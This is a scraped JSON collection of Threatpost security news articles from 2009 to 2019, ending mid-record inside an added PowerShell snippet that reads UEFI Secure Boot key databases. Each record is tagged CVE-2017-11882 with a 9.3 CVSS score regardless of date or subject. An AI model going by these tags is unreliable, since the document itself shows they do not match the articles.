Despite having its hard drive wiped and its factory settings previously reset, the console was cracked after the students installed a software \u201cmodding\u201d tool that allows Xbox owners to install applications that aren\u2019t sanctioned by Microsoft.\n\nMicrosoft called the hack unlikely in a [statement obtained by ZDNet](<http://www.zdnet.com/blog/security/microsoft-investigating-used-xbox-360-credit-card-hack/11260?tag=content;siu-container>) on Monday.\n\nJim Alkove, General Manager, Security of Microsoft\u2019s Interactive Entertainment Business division, claimed the company launched an investigation into the hack. Alkove asserted that Xbox 360 consoles are not designed to store credit card data, adding that it was unlikely any information was recovered in the fashion the hackers described.\n\n\u201cWhen Microsoft refurbishes used consoles we have processes in place to wipe the local hard drives of any other user data,\u201d Alkove said, \u201cwe can assure Xbox owners we take the privacy and security of their personal data very seriously.\u201d\n\nGawker\u2019s video game blog [Kotaku](<http://kotaku.com/5897461/hackers-can-steal-credit-card-information-from-your-old-xbox-experts-tell-us>) interviewed Podhradsky about the device\u2019s security late last week.\n\n\u201cMicrosoft does a great job of protecting their proprietary information,\u201d she told the site, \u201cbut they don\u2019t do a great job of protecting the user\u2019s data.\u201d\n\nWhile the security of Microsoft\u2019s gaming console ([Xbox Live phishing attempts](<https://threatpost.com/xbox-security-chief-says-account-hacks-linked-phishing-resale-schemes-102011/>), etc.) 
has been called into question before, this is one of the first reports that claim the console\u2019s physical hard drive may be at risk.\n\nNASA, whose hard drives arguably carry more sensitive information than an Xbox, [caught similar heat in 2010](<https://threatpost.com/audit-nasa-fails-properly-wipe-data-discarded-drives-120810/>) after it was found not adequately wiping, sanitizing and destroying its own hard drives.\n", "cvss3": {}, "published": "2012-04-03T21:13:12", "type": "threatpost", "title": "Microsoft to Investigate Alleged Xbox Credit Card Hack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:31", "id": "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "href": "https://threatpost.com/microsoft-investigate-alleged-xbox-credit-card-hack-040312/76392/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Much like the Year of PKI that has never come to be, information sharing has been one of security\u2019s more infamous non-starters. 
While successful in heavily siloed environments such as financial services, enterprises industry-wide are hesitant to share threat and security data for fear of [losing a competitive edge](<http://threatpost.com/share-and-share-alike-not-quite/100916>) or exposing further vulnerabilities.\n\nMicrosoft hopes the latest tweak to its Microsoft Active Protections Program (MAPP) will calm the waters a bit and engage companies and industries to [share threat data](<http://threatpost.com/adequate-attack-data-and-threat-information-sharing-no-longer-luxury-111512/77221>) in an effort to stem the effects of targeted and persistent attacks and speed up incident response and recovery.\n\nA private preview is scheduled to open this week for [Microsoft Interflow](<http://www.microsoft.com/interflow>), a distributed platform for information exchange that is built on open specifications such as the Structured Threat Information eXpression ([STIX](<https://stix.mitre.org/>)), the Trusted Automated eXchange of Indicator Information ([TAXII](<https://taxii.mitre.org/>)), and the Cyber Observable eXpression standards ([CybOX](<http://cybox.mitre.org/>)). Today\u2019s announcement comes 11 months after Microsoft expanded MAPP, its vendor partner [information-sharing program to include incident responders](<http://threatpost.com/microsoft-expands-mapp-program-to-incident-response-teams/101524>).\n\n\u201cWe realized when we were building [MAPP for IR] that we needed a better way to automate the exchange of information with partners,\u201d said Jerry Bryant, senior security strategist, Microsoft Security Response Center.\n\nInterflow is built in Microsoft\u2019s Azure cloud-based application hosting platform, and organizations can use its management console to subscribe to different threat feeds, build a community of trusted partners with whom to share data, and set trust levels on those relationships, Bryant said. 
A watchlist feature allows companies to filter the potential thousands of [indicators of attacks](<http://threatpost.com/defenders-still-chasing-adequate-threat-intelligence-sharing/102904>) and threats they may receive, and those indicators can be configured to feed directly into an intrusion detection system, firewall or endpoint protection system, Bryant said.\n\n\u201cThe system is designed for end-to-end automation. We have APIs that can be used to subscribe to and process feeds into endpoint protection. It\u2019s designed to integrate with investments you\u2019ve already made,\u201d Bryant said. \u201cIf you\u2019re using SIEM to do analysis, this, through a plug-in architecture, plugs into that console. You can use it also for additional sets of data or build sets of data that you can share back out with partners.\u201d\n\nWhile Interflow\u2019s extensibility allows for customization of the feeds it processes, it will arrive with a number of feeds provided by Microsoft as well, ranging from malicious URLs used in attack campaigns, to detection guidance that can help partners write signatures. Those companies will also have the option of sending telemetry data back to Microsoft based on hits against those signatures once they\u2019re deployed, Bryant said.\n\nInterflow is not the only sharing platform to support STIX and TAXII; Bryant said Interflow is meant to be complementary to many of those platforms, including established one-to-many systems such as those used by the Financial Services Information Sharing and Analysis Center ([FS-ISAC](<https://www.fsisac.com/>)).\n\n\u201cWe\u2019re making sure our system talks to theirs,\u201d Bryant said of ISACs. \u201cThey have valuable data sets for those communities and valuable information for us. 
We can send them indicators [of compromise] and they can send telemetry to us that improves our responses and drives decision-making for out-of-band patches, for example.\u201d\n\nTelemetry exchange is not required, however, Bryant said.\n\n\u201cCompanies will establish their own communities they want to share with. We want to be in their communities and we will make feeds available, but they don\u2019t have to share back with us.\n\n\u201cWe talked to CISOs, and some don\u2019t like the idea of having to share their data back with a private organization. We don\u2019t require that; we just want to facilitate more sharing in the industry.\u201d\n\nBryant said anonymization and data sanitation capabilities are on the Interflow road map. For now, Microsoft has not set a general availability timeline for Interflow.\n\n\u201cPeople are getting more interested in sharing more of their own information. Obviously, there\u2019s a lot of hesitancy, but you can start out cautiously with Interflow and develop tight circles,\u201d Bryant said. \u201cThat\u2019s part of what we\u2019re trying to do is facilitate the next level of sharing and enable bidirectional sharing and connecting of systems. Our goal is to break down barriers and get more data flowing in the industry. 
Today, the way it works is not keeping up with threats.\u201d\n", "cvss3": {}, "published": "2014-06-23T09:03:23", "type": "threatpost", "title": "Microsoft Interflow Information-Sharing Platform Preview Open", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-06-24T13:04:01", "id": "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "href": "https://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:55", "description": "[From InfoWorld (Roger Grimes)](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)\n\n[](<https://threatpost.com/microsoft-takes-lead-security-061909/>)Talk about a turnaround. It\u2019s always hard to recognize the larger, slow-moving paradigm shifts as they happen. But after a decade of bad press regarding its commitment to software security, Microsoft seems to have turned the tide. Redmond is getting consistent security accolades these days, often from the very critics who used to call it out. Many of the world\u2019s most knowledgeable security experts are urging their favorite software vendors to follow in the footsteps of Microsoft. 
Read the full story [[InfoWorld.com](<http://www.infoworld.com/d/security-central/pigs-fly-microsoft-leads-in-security-200?page=0,0&source=IFWNLE_nlt_daily_2009-06-19>)].\n", "cvss3": {}, "published": "2009-06-19T18:13:35", "type": "threatpost", "title": "Microsoft Takes the Lead in Security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:58", "id": "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "href": "https://threatpost.com/microsoft-takes-lead-security-061909/72854/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:32", "description": "Windows 8 is still off on the horizon somewhere, but the new version of Internet Explorer that\u2019s coming with it\u2013IE 10\u2013already is in consumer preview and it includes some major changes to the exploit mitigations. In addition to the existing implementations of ASLR, DEP and others technologies in Windows and IE, Microsoft has included a couple of new ones designed to further inhibit memory attacks.\n\nThe biggest change in IE 10 is a technology called ForceASLR that\u2019s meant to help compensate for the fact that not every application on Windows is compiled with the flag that opts them into ASLR. One of the main exploit mitigations that Microsoft has added to Windows in recent years, ASLR (address space layout randomization) essentially turns memory modules into moving targets for attackers, making it far more difficult for them to locate their payloads where they want. This has made browser-based exploits more complicated, but it only works if developers compile their applications with a specific flag, called /DYNAMICBASE, set. \n\nThe new ForceASLR technology helps fix that shortcoming by allowing IE to tell Windows to load every module in a random location, regardless of whether it was compiled with the /DYNAMICBASE flag. 
Microsoft security officials say that this is among the more important additions the company has made to the security of its browser and Windows machines.\n\n\u201cForceASLR is arguably the most important change to ASLR in Windows 8. ForceASLR is a new loader option used by Internet Explorer 10 to instruct the operating system to randomize the location of _all_ modules loaded by the browser, even if a given module was not compiled with the /DYNAMICBASE flag. The ForceASLR protection was added to the Windows 8 kernel, and the feature is now available as an update to Windows 7 that will be installed when Internet Explorer 10 is installed on that platform,\u201d [Forbes Higman](<http://blogs.msdn.com/b/ie/archive/2012/03/12/enhanced-memory-protections-in-ie10.aspx?Redirected=true>), a security program manager on IE, wrote in a blog post.\n\nIn addition to ForceASLR, Microsoft has included another mitigation called High Entropy ASLR that takes advantage of the larger address space that\u2019s available on 64-bit Windows machines. The more entropy that the operating system can add to the randomization, the more difficult life will be for attackers who are trying to place their payloads precisely.\n\n\u201cThis has the effect of drastically increasing the number of potential addresses that may be assigned to a 64bit process. All 64bit processes can opt-in to the increased entropy made available by HEASLR. 
Processes can opt-in either at link time (/HIGHENTROPYVA) or at load time via a new Image File Execution Option,\u201d Higman said.\n\nSecurity researchers have been looking at the new protections in IE 10 and some have said that they are going to present a serious challenge for exploitation.\n\n\u201cIt will make exploitation much harder and more complicated,\u201d Chaouki Bekrar of VUPEN said at the CanSecWest conference last week when talking about the new mitigations.\n", "cvss3": {}, "published": "2012-03-13T19:08:41", "type": "threatpost", "title": "Microsoft Adds New Exploit Mitigations to IE 10", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:38", "id": "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "href": "https://threatpost.com/microsoft-adds-new-exploit-mitigations-ie-10-031312/76321/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:51", "description": "[](<https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/>)Microsoft on Tuesday released (again) the five security bulletins for its September Patch Tuesday. None of the fixes being released today is rated critical, with all five being rated important. Three of the bulletins fix flaws that could result in code execution.\n\nMicrosoft also updated the security bulletin it originally released a couple of weeks ago regarding the DigiNotar compromise, revoking trust for an additional six root certificates issued by the CA. The company removed trust for a number of certificates that were cross-signed by GTE and Entrust. 
Here is the list of certificates placed by Microsoft into the Untrusted Certificate Store:\n\n * DigiNotar Root CA\n * DigiNotar Root CA G2\n * DigiNotar PKIoverheid CA Overheid\n * DigiNotar PKIoverheid CA Organisatie \u2013 G2\n * DigiNotar PKIoverheid CA Overheid en Bedrijven\n * DigiNotar Root CA Issued by Entrust (2 certificates)*\n * DigiNotar Services 1024 CA Issued by Entrust*\n * Diginotar Cyber CA Issued by GTE CyberTrust (3 certificates)*\n\nThe five bulletins released by Microsoft on Tuesday include fixes for vulnerabilities in Windows, Office, Excel, Sharepoint and WINS. In an odd mistake, Microsoft on Friday accidentally made the link to the September bulletins live four days early. The page was only available for a short time before Microsoft removed it, but it was long enough for several sites to post the text of the advisories.\n", "cvss3": {}, "published": "2011-09-13T18:08:30", "type": "threatpost", "title": "Microsoft Releases Five Bulletins For September Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:47", "id": "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "href": "https://threatpost.com/microsoft-releases-five-bulletins-september-patch-tuesday-091311/75649/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-11-03T07:10:35", "description": "Phishing attempts more than doubled in 2018, as bad actors sought to trick victims into handing over their credentials. They used both old tricks \u2013 such as scams tied to current events \u2013 as well as other stealthy, fresher tactics.\n\nResearchers with Kaspersky Lab said in a [Tuesday report](<https://securelist.com/spam-and-phishing-in-2018/89701/>) that during the course of 2018, they detected phishing redirection attempts 482.5 million times \u2013 up from the 246.2 million attempts detected in 2017. 
In total, 18.32 percent of users were attacked, researchers said.\n\n\u201cWe have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019,\u201d according to the report, by Maria Vergelis, Tatyana Shcherbakova and Tatyana Sidorina with Kaspersky Lab. \u201cDespite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of this.\u201d\n\n## Current Events: A Go-To Phishing Hook\n\nBad actors continued to rely on an age-old trick in 2018 for phishing attacks: Using newsworthy events, such as new smartphone launches, [sales seasons](<https://threatpost.com/threatlist-gift-card-themed-bec-holiday-scams-spike/139716/>), [tax deadlines](<https://threatpost.com/fbi-warns-of-spike-in-w-2-phishing-campaigns/130057/>), and the EU General Data Protection Regulation (GDPR) to hook the victim.\n\nPhishing emails purporting to be about GDPR, for instance, boomed [in the first few months](<https://threatpost.com/gdpr-phishing-scam-targets-apple-accounts-financial-data/131915/>) of 2018, because during those months there was an upturn in legitimate GDPR mailings warning users of the transition to the new policies, which require stringent processes to store and process personal data of European citizens.\n\nAttackers unsurprisingly took advantage of this with their own GDPR-related emails: \u201cIt was generally B2B spam \u2014 mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business,\u201d said researchers.\n\nOther top events, such as the 2018 [FIFA World Cup](<https://threatpost.com/world-cup-vacation-scams-lead-in-phishing-trips-this-summer/132543/>) and the launch of the new iPhone 
sparked phishing attempts, including emails leading to fake FIFA partner websites for the former, and spam messages purporting to sell accessories and replica gadgets for the latter.\n\n## Cryptocurrency Targets\n\nDespite the cryptocurrency market\u2019s [struggle in 2018](<https://www.cnbc.com/2018/10/12/bitcoin-price-cryptocurrency-market-drops-as-xrp-ethereum-plunge.html>), bad actors\u2019 interest in cryptocurrencies appears far from waning. In fact, scammers used a number of methods to capitalize on victims\u2019 interest in the cryptocurrency market, such as posing as a cryptocurrency exchange or a fake Initial Coin Offering (ICO) to convince victims to transfer money to cryptocurrency wallets.\n\n\u201cIn 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges and platforms,\u201d researchers said. \u201cFraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152522/190311-spam-report-2018-7.png>)\n\nWhen it came to ICOs, scammers extended invitations to victims for investing in various ICOs via email and social-media posts.\n\nOne such scam targeted a cryptocurrency called buzcoin; the scammers obtained the project mailing list and sent fake presale invitations to subscribers before the ICO began \u2013 eventually making off with $15,000, according to Kaspersky Lab.\n\nThere were also sextortion scams that coerced victims to send cryptocurrency in exchange for keeping quiet about their private online activities, with one campaign in July noted for using victims\u2019 [legitimate passwords](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) in the email as a scare tactic; and another one in December hit victims with 
[ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>).\n\nResearchers said they don\u2019t expect attackers\u2019 interest in cryptocurrency to die down any time soon: \u201cIn 2019, spammers will continue to exploit the cryptocurrency topic,\u201d they said. \u201cWe expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.\u201d\n\n## Other Tricks\n\nIn 2018, the number of malicious messages in spam fell by a factor of 1.2 compared with 2017, according to researchers. Of those malicious messages, the most widely distributed malicious object in email ([Exploit.Win32, CVE-2017-11882](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>)) targeted a memory-corruption flaw in the Equation Editor component of Microsoft Office, patched by Microsoft in November 2017, that lets an attacker execute arbitrary code when the victim opens a crafted document.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152819/malware-phishing.png>)\n\nDespite this downturn in malicious emails, scammers appear to be turning to other tactics to evade detection and still make off with victims\u2019 credentials \u2014 in particular, packaging spam in atypical attachment formats such as ISO, IQY, PIF and PUB.\n\n\u201c2018 saw a continuation of the trend for attention to detail in email presentation,\u201d researchers said. 
\u201cCybercriminals imitated actual business correspondence using the companies\u2019 real details, including signatures and logos.\u201d\n\nIn addition, bad actors appeared to transition to new channels of content distribution beyond email \u2013 including social media sites, services like [Spotify](<https://threatpost.com/spotify-phishers-hijack-music-fans-accounts/139329/>), or even [Google Translate](<https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/>).\n\n\u201cCybercriminals in 2018 used new methods of communication with their \u2018audience,\u2019 including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages,\u201d said researchers. \u201cHand-in-hand with this, as illustrated by [an] attack on universities, fraudsters are seeking not only new channels, but new targets as well.\u201d\n", "cvss3": {}, "published": "2019-03-12T20:48:20", "type": "threatpost", "title": "ThreatList: Phishing Attacks Doubled in 2018", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-03-12T20:48:20", "id": "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "href": "https://threatpost.com/threatlist-phishing-attacks-doubled-in-2018/142732/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:02:33", "description": "[](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/>)LAS VEGAS\u2013Microsoft on Thursday handed out three rather large checks to a trio of security researchers, the largest one\u2013$200,000\u2013going to Vasillis Pappas who won the company\u2019s first [Blue Hat Prize](<https://threatpost.com/three-nations-and-three-different-perspectives-blue-hat-finalists-focus-defense-072612/>) competition for defensive technologies. 
Pappas\u2019s kBouncer ROP mitigation technology edged out ROP-related submissions from the two other finalists, and will be integrated by Microsoft in the near future.\n\nThe company announced Pappas as the winner of the contest at its annual party at the end of the Black Hat conference here with a splashy American Idol-style reveal, complete with blaring music and a massive confetti shower. Pappas, a PhD candidate at Columbia University, has been focused on the research for his submission for more than a year. His kBouncer technology uses a kernel driver to read the processor\u2019s last branch records, the hardware trace of the most recent control transfers, and checks them whenever a process enters the kernel through a system call: a return instruction whose target is not preceded by a call is the signature of a return-oriented programming chain, and kBouncer blocks the call when it sees one.\n\nIn addition to the $200,000 that Pappas won, Ivan Fratric was awarded $50,000 for his ROPGuard technology and Jared DeMott won $10,000 and an MSDN subscription for his /ROP submission. Microsoft officials said they were quite happy with the quality of the submissions for the contest and accomplished their stated goal of identifying innovative defensive technologies.\n\n\u201cRunning the BlueHat Prize contest allowed us insight into a greater number of people who are doing some deep thinking in the areas of security mitigation technology. This not only helps Microsoft find and work with talented people, but the spotlight that we can help shine on all of these contestants will hopefully help them market their ideas and talent so that the entire security industry can benefit and improve,\u201d [Katie Moussouris of Microsoft](<https://blogs.technet.com/b/ecostrat/archive/2012/07/26/the-bluehat-prize-v1-0-and-the-winners-are.aspx?Redirected=true>) said in a blog post on the contest.\n\nMicrosoft officials have said repeatedly in the last few years that the company does not plan to offer bug bounties to security researchers who discover vulnerabilities in Microsoft products. 
Google, Mozilla and several other companies have such programs, and the Blue Hat prize was Microsoft\u2019s way of responding and attempting to focus the energy of researchers on defensive technologies instead of finding bugs.\n\n\u201cOne thing is certain \u2013 we will continue to invest in security defense at Microsoft, and we will continue to offer cash incentives to the security community for helping Microsoft, and the rest of the industry, to help improve the state of security for the entire ecosystem. In sports, as in life, a great team understands both offense and defense. To address the security threats of today and tomorrow, we as an industry need to appreciate both,\u201d Moussouris said.\n\n \n\n", "cvss3": {}, "published": "2012-07-27T13:57:41", "type": "threatpost", "title": "Vasillis Pappas Wins $200,000 Microsoft Blue Hat Prize", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:47", "id": "THREATPOST:44C93D75841336281571380C5E523A23", "href": "https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/76857/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:40", "description": "[](<https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/>)There is an unpatched flaw in Microsoft SQL Server that could enable an attacker to access users\u2019 passwords on the database server. The vulnerability is in SQL Server 2000, 2005 and 2008.\n\nThe SQL Server vulnerability was discovered last fall by database-security vendor Sentrigo, which then reported the problem to Microsoft. But the software giant did not consider the problem serious enough to warrant a patch, Sentrigo officials said, so the weakness has remained unpatched for nearly a year. 
Sentrigo has released a [free software tool](<http://www.sentrigo.com/passwords>) that will address the problem, though it does not patch the vulnerability.\n\nThe tool, called Passwordizer, erases the cleartext passwords from the SQL Server process\u2019s memory.\n\nIn a statement, Microsoft officials said the company is not planning to patch the flaw and does not see it as a problem that requires a security update.\n\nThe flaw lies in the way that SQL Server handles user passwords. By looking at the process memory, an administrator can see other users\u2019 passwords in cleartext. However, in order to see the process memory dump, a user would have to have administrator rights already, a condition that limits the severity of the bug.\n\n\u201cDevelopers go to great lengths to ensure passwords are not even transmitted in clear text (for example at the time of login), let alone stored in a readable form. Users have come to expect that their personal passwords, are exactly that \u2013personal \u2013 and that not even administrators can see them. Exploiting this vulnerability, an administrator will be able to see the passwords of users and applications that have connected to SQL Server, all the way back to the last restart,\u201d said Slavik Markovich, CTO of Sentrigo. \u201cWe respectfully disagree with Microsoft\u2019s view that since it requires administrative privileges, the risk is mitigated. 
Even if you trust your admins, there are plenty of hackers capable of gaining escalated privileges, who could now easily access other systems across the network using these passwords.\u201d\n\nThe flaw can be exploited remotely in SQL Server 2000 and 2005, but in SQL Server 2008 Microsoft made a change to make it more difficult for administrators to access the memory, so an attacker would need local access to the machine in that case.\n", "cvss3": {}, "published": "2009-09-02T12:30:49", "type": "threatpost", "title": "New Unpatched Flaw Surfaces in SQL Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "href": "https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/73026/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:49", "description": "[](<https://threatpost.com/end-support-xp-sp2-end-era-051310/>)Microsoft\u2019s announcement this week that it is preparing to [end support for machines running Windows XP SP2](<http://windows.microsoft.com/en-us/windows/help/end-support-windows-xp-sp2-windows-vista-without-service-packs?os=other>) not only represents a challenge for the thousands of businesses still running SP2, but also is the end of an era for both Microsoft and its customers.\n\nBy the time Microsoft drops support for XP SP2 on July 13, Windows XP will be nearly nine years old. The OS was released in August 2001 as a replacement for Windows 2000 and was the last full release of Windows before Microsoft started its Trustworthy Computing effort. 
Very soon after the famous memo from Bill Gates appeared, attention both inside and outside the company focused on hardening Windows XP.\n\nThe first release of Windows XP was not seen as much of a security upgrade over Windows 2000, and it became clear fairly quickly that it was going to need some serious help. And soon. Windows XP had a firewall installed with it, but it was turned off by default and wasn\u2019t obvious to a lot of users. \n\nWith Service Pack 2 Microsoft set out to fix that and add a number of other security protections, as well. It wasn\u2019t until 2004 that the final release of XP SP2 actually hit the streets. But when it did, it represented a huge step forward in security for Windows users. It wasn\u2019t necessarily the feature set that mattered as much as the fact that the protections were enabled by default and taken out of the users\u2019 hands.\n\nXP SP2 not only turned on the Windows Firewall by default, a major upgrade in itself, but also added support for hardware-enforced DEP (Data Execution Prevention), which marks stack and heap pages non-executable so that the classic buffer overflow exploit, which jumps into shellcode injected into those pages, faults instead of running. This was at a time when worms such as Code Red, Nimda and others were tearing through networks around the world, exploiting memory vulnerabilities and paralyzing systems. \n\nThe combination of these security features and the addition of the Windows Security Center, which gave users a dashboard-type view of the status of their antivirus software, firewall and other protections, was a milestone in desktop security. Microsoft has continued to add security features to subsequent releases of Windows, but XP SP2 was the one that started it all.\n\nAnd now, Microsoft is ending support for XP SP2, as well as for Windows 2000, a move that\u2019s been anticipated for some time. (The company will still support SP3 for Windows XP.) 
It\u2019s a decision that likely has as much to do with the company\u2019s interest in having customers upgrade to a new version of Windows\u2013or even a new machine entirely\u2013as it does with the practical considerations of continuing to provide patches and tech support for outdated OS versions. But that doesn\u2019t make it any less problematic for organizations that have plenty of XP machines happily humming along.\n\nAs [Byron Acohido points out](<http://lastwatchdog.com/microsoft-security-support-windows-xp-service-pack/>), this is not an insignificant problem. \n\n\u201cSuch desktop PCs and servers are still widely used in corporate networks globally. And as anyone paying attention knows, infected PCs in corporate settings are in [high demand](<http://lastwatchdog.com/brazil-india-move-top-5-nations-generating-malicious/>) by cyber gangs controlling the botnets driving all forms of cybercrime. Botnets are used to spread spam, steal data, hijack online bank accounts, commit click fraud and conduct denial-of-service attacks for extortion or political reasons,\u201d Acohido writes.\n\nOlder machines often are prime targets for attackers, who know that these PCs are less likely to be fully updated. But they\u2019re just as valuable to botmasters, spammers and other attackers as newer PCs are. A win is a win, regardless of the victim\u2019s age.\n\nFor Microsoft and its customers, the end of support for XP SP2 is the end of the beginning of Microsoft\u2019s security initiative. 
\n", "cvss3": {}, "published": "2010-05-13T18:04:39", "type": "threatpost", "title": "End of Support for XP SP2 is End of an Era", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:47:01", "id": "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "href": "https://threatpost.com/end-support-xp-sp2-end-era-051310/73965/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:47", "description": "[](<https://threatpost.com/microsoft-defends-secure-boot-windows-8-092311/>)Microsoft officials are seeking to assuage concerns that its implementation of UEFI in Windows 8 will prevent users from loading non-Microsoft operating systems or applications on their machines. Despite concerns raised by security researchers and open-source advocates about vendor lock-in and other issues arising from the use of a secure boot sequence in the upcoming OS, Microsoft says \u201cthe customer is in control of their PC.\u201d\n\nIn the days since Microsoft began talking about the details of Windows 8 and the security measures that it has added to the new version of the OS, security researchers and others have raised questions about the consequences of the secure boot sequence, which is built on UEFI firmware in place of a traditional BIOS. The boot sequence for Windows 8, which is due in 2012, will be markedly different from that of its predecessors. The most notable difference is that the firmware will only hand off to boot code whose digital signature it can verify against the certificates and hashes in its authorized signature database (db), a variable kept in the firmware\u2019s non-volatile storage that can only be changed by an update signed with a key enrolled in the key exchange key (KEK) variable, which in turn is controlled by the OEM-held platform key (PK). Any boot module that isn\u2019t signed, or whose signature doesn\u2019t chain to an entry in db (or that is listed in the forbidden database, dbx), won\u2019t be loaded.\n\nThe goal of this is to prevent malware such as rootkits and bootkits from staying resident on machines and reloading each time the machine is restarted. 
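The verification step just described can be inspected from the inside on a UEFI machine running Windows 8 or later. The PowerShell below is an example added for this page, not code from Microsoft or from the article: it reports whether Secure Boot is enforced and decodes the platform key (PK), key exchange keys (KEK) and authorized signature database (db) into the individual certificates and hashes the firmware will accept, walking the EFI_SIGNATURE_LIST layout from the UEFI specification. It assumes the built-in SecureBoot module (Confirm-SecureBootUEFI and Get-SecureBootUEFI) is present and that it runs from an elevated prompt; the function names and output format are chosen for the example.

```powershell
# Added example for this page; not code from Microsoft or from the article.
# Requires Windows 8 or later booted in UEFI mode, an elevated prompt, and the
# built-in SecureBoot module. Function names are chosen for the example.

# Signature-type GUIDs defined in the UEFI specification (EFI_SIGNATURE_LIST.SignatureType).
$EfiCertX509Guid   = [guid]'a5c059a1-94e4-4aa7-87b5-ab155c2bf072'   # EFI_CERT_X509_GUID: DER certificate
$EfiCertSha256Guid = [guid]'c1c41626-504c-4092-aca9-41f936934328'   # EFI_CERT_SHA256_GUID: hash of a PE image

function ConvertTo-Guid([byte[]]$Slice) {
    New-Object System.Guid -ArgumentList (,$Slice)        # 16 little-endian bytes -> GUID
}

function Get-SecureBootState {
    # Confirm-SecureBootUEFI returns $true/$false on UEFI firmware and throws
    # PlatformNotSupportedException when the machine booted through a legacy BIOS.
    try {
        if (Confirm-SecureBootUEFI) { 'Enabled' } else { 'Disabled: firmware will hand off to unsigned boot code' }
    } catch [System.PlatformNotSupportedException] {
        'Not available: legacy BIOS boot'
    }
}

function Get-EfiSignatureEntries {
    # Decode one Secure Boot variable (PK, KEK, db or dbx) into one object per entry.
    param([Parameter(Mandatory)][ValidateSet('PK','KEK','db','dbx')][string]$Name)

    $bytes  = (Get-SecureBootUEFI -Name $Name).Bytes
    $offset = 0
    while ($offset + 28 -le $bytes.Length) {
        # EFI_SIGNATURE_LIST header: SignatureType GUID(16) | SignatureListSize(4)
        #                            | SignatureHeaderSize(4) | SignatureSize(4)
        $type       = ConvertTo-Guid $bytes[$offset..($offset + 15)]
        $listSize   = [BitConverter]::ToUInt32($bytes, $offset + 16)
        $headerSize = [BitConverter]::ToUInt32($bytes, $offset + 20)
        $sigSize    = [BitConverter]::ToUInt32($bytes, $offset + 24)
        if ($listSize -lt 28 -or $sigSize -le 16) { break }   # malformed list: stop rather than spin

        $pos = $offset + 28 + $headerSize
        $end = [Math]::Min($offset + $listSize, $bytes.Length)
        while ($pos + $sigSize -le $end) {
            # EFI_SIGNATURE_DATA: SignatureOwner GUID(16) | SignatureData(SignatureSize - 16)
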